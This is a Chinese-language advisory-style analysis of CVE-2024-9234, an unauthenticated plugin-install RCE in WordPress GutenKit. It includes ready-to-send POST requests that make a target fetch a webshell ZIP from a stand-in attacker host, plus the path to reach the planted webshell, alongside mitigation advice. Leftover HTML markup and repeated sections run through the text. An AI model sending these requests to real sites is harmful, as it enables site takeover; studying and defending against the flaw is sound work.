WordPress GutenKit插件RCE漏洞分析 (CVE-2024-9234)<\/h1>

漏洞概述<\/h2>
GutenKit是WordPress的一个页面构建器插件，用于Gutenberg块编辑器。在2.1.0及以下版本中存在一个严重的安全漏洞，允许未经身份验证的攻击者远程执行代码(RCE)。<\/p>

漏洞影响<\/h3>

影响版本<\/strong>: GutenKit插件2.1.0及以下所有版本<\/li>
漏洞类型<\/strong>: 任意文件上传导致远程代码执行<\/li>
攻击复杂度<\/strong>: 低<\/li>
权限要求<\/strong>: 无需认证<\/li>

影响程度<\/strong>: 高危<\/li> <\/ul>
漏洞环境<\/h2>
受影响环境<\/h3>

WordPress安装GutenKit插件且版本≤2.1.0<\/li>
PHP版本7.4及以上<\/li>
测试环境验证版本: WordPress 6.7.1<\/li> <\/ul>
漏洞分析<\/h2>
漏洞位置<\/h3>
漏洞位于插件文件gutenkit-blocks-addon\/gutenkit-blocks-addon.php<\/code>中的install_and_activate_plugin_from_external()<\/code>函数。<\/p>
漏洞成因<\/h3> 功能检查缺失<\/strong>: 该函数(对应install-active-plugin<\/code> REST API端点)缺少必要的权限检查<\/li> 参数可控<\/strong>: 函数接受两个可控参数: plugin<\/code>: 指定要下载的插件ZIP包URL<\/li> slug<\/code>: 指定插件解压后的目录名<\/li> <\/ul> <\/li> 直接调用<\/strong>: 该函数注册了REST API路由，可通过HTTP请求直接调用<\/li> 文件下载<\/strong>: 使用WordPress核心函数download_url()<\/code>下载指定URL的文件<\/li> <\/ol> 攻击流程<\/h3> 攻击者构造恶意ZIP包(包含Webshell)并托管在可控服务器<\/li> 向目标站点发送精心构造的POST请求<\/li> 目标站点下载并解压恶意ZIP包到插件目录<\/li> 攻击者访问解压后的Webshell执行任意代码<\/li> <\/ol> 漏洞复现<\/h2> 复现步骤<\/h3> 准备一个包含Webshell的ZIP压缩包<\/li> 将ZIP包托管在攻击者控制的服务器上<\/li> 向目标站点发送以下请求之一:<\/li> <\/ol> 方法1: JSON格式<\/strong><\/p> POST \/wp-json\/gutenkit\/v1\/install-active-plugin HTTP\/2 <\/span><\/span><\/span>Host: vulnerable-site.example.com <\/span><\/span><\/span>Content-Type: application\/json <\/span><\/span><\/span>Content-Length: 114 <\/span><\/span><\/span> <\/span><\/span><\/span>{ <\/span><\/span><\/span> "plugin": "https:\/\/attacker.com\/malicious-plugin.zip", <\/span><\/span><\/span> "slug": "malicious-plugin" <\/span><\/span><\/span>} <\/span><\/span><\/span><\/code><\/pre>方法2: Form格式<\/strong><\/p> POST \/wp-json\/gutenkit\/v1\/install-active-plugin HTTP\/2 <\/span><\/span><\/span>Host: vulnerable-site.example.com <\/span><\/span><\/span>Content-Type: application\/x-www-form-urlencoded <\/span><\/span><\/span>Content-Length: 114 <\/span><\/span><\/span> <\/span><\/span><\/span>plugin=https:\/\/attacker.com\/malicious-plugin.zip <\/span><\/span><\/span><\/code><\/pre> 虽然响应可能显示"The plugin directory does not exist after unzipping"，但恶意文件可能已上传<\/li> 访问上传的Webshell: https:\/\/vulnerable-site.example.com\/wp-content\/plugins\/malicious-plugin\/webshell.php<\/code><\/li> <\/ol> 官方PoC示例<\/h3> POST \/wp-json\/gutenkit\/v1\/install-active-plugin HTTP\/2 <\/span><\/span><\/span>Host: wpscan-vulnerability-test-bench.ddev.site <\/span><\/span><\/span>Content-Type: application\/json <\/span><\/span><\/span>Content-Length: 114 <\/span><\/span><\/span> <\/span><\/span><\/span>{ <\/span><\/span><\/span> "plugin": "https:\/\/downloads.wordpress.org\/plugin\/popularis-extra.1.2.6.zip", <\/span><\/span><\/span> "slug": "popularis-extra" <\/span><\/span><\/span>} <\/span><\/span><\/span><\/code><\/pre>防御措施<\/h2> 临时缓解方案<\/h3> 立即禁用或卸载GutenKit插件<\/li> 检查wp-content\/plugins<\/code>目录是否有可疑文件<\/li> 更新服务器和网站的安全配置<\/li> <\/ol> 永久解决方案<\/h3> 升级GutenKit插件到最新安全版本(2.1.0以上)<\/li> 实施Web应用防火墙(WAF)规则阻止相关攻击<\/li> 限制WordPress REST API的访问权限<\/li> <\/ol> 技术细节<\/h2> 漏洞函数分析<\/h3> function<\/span> install_and_activate_plugin_from_external<\/span>($request) { <\/span><\/span> \/\/ 缺少权限检查 <\/span><\/span><\/span><\/span> $plugin =<\/span> $request-><\/span>get_param<\/span>('plugin'<\/span>); \/\/ 可控参数 <\/span><\/span><\/span><\/span> $slug =<\/span> $request-><\/span>get_param<\/span>('slug'<\/span>); \/\/ 可控参数 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 下载指定URL的插件包 <\/span><\/span><\/span><\/span> $download =<\/span> download_url<\/span>($plugin); <\/span><\/span> <\/span><\/span> \/\/ 解压并安装插件 <\/span><\/span><\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>攻击限制<\/h3> 需要目标服务器能够访问攻击者控制的URL<\/li> 上传的文件必须符合WordPress插件的基本结构(至少包含一个PHP文件)<\/li> 解压后的目录名由slug<\/code>参数控制<\/li> <\/ol> 总结<\/h2> CVE-2024-9234是一个严重的未授权RCE漏洞，允许攻击者通过WordPress REST API上传并执行任意代码。由于攻击门槛低且影响严重，所有使用GutenKit插件的网站应立即采取防护措施。<\/p>

WordPress GutenKit插件RCE漏洞分析 (CVE-2024-9234)<\/h1>

漏洞概述<\/h2> GutenKit是WordPress的一个页面构建器插件，用于Gutenberg块编辑器。在2.1.0及以下版本中存在一个严重的安全漏洞，允许未经身份验证的攻击者远程执行代码(RCE)。<\/p>

漏洞环境<\/h2>

漏洞分析<\/h2>

漏洞位置<\/h3> 漏洞位于插件文件gutenkit-blocks-addon\/gutenkit-blocks-addon.php<\/code>中的install_and_activate_plugin_from_external()<\/code>函数。<\/p>

漏洞复现<\/h2>

防御措施<\/h2>

技术细节<\/h2>

总结<\/h2> CVE-2024-9234是一个严重的未授权RCE漏洞，允许攻击者通过WordPress REST API上传并执行任意代码。由于攻击门槛低且影响严重，所有使用GutenKit插件的网站应立即采取防护措施。<\/p>

漏洞概述<\/h2>
GutenKit是WordPress的一个页面构建器插件，用于Gutenberg块编辑器。在2.1.0及以下版本中存在一个严重的安全漏洞，允许未经身份验证的攻击者远程执行代码(RCE)。<\/p>

漏洞位置<\/h3>
漏洞位于插件文件`gutenkit-blocks-addon\/gutenkit-blocks-addon.php<\/code>中的install_and_activate_plugin_from_external()<\/code>函数。<\/p>`

总结<\/h2>
CVE-2024-9234是一个严重的未授权RCE漏洞，允许攻击者通过WordPress REST API上传并执行任意代码。由于攻击门槛低且影响严重，所有使用GutenKit插件的网站应立即采取防护措施。<\/p>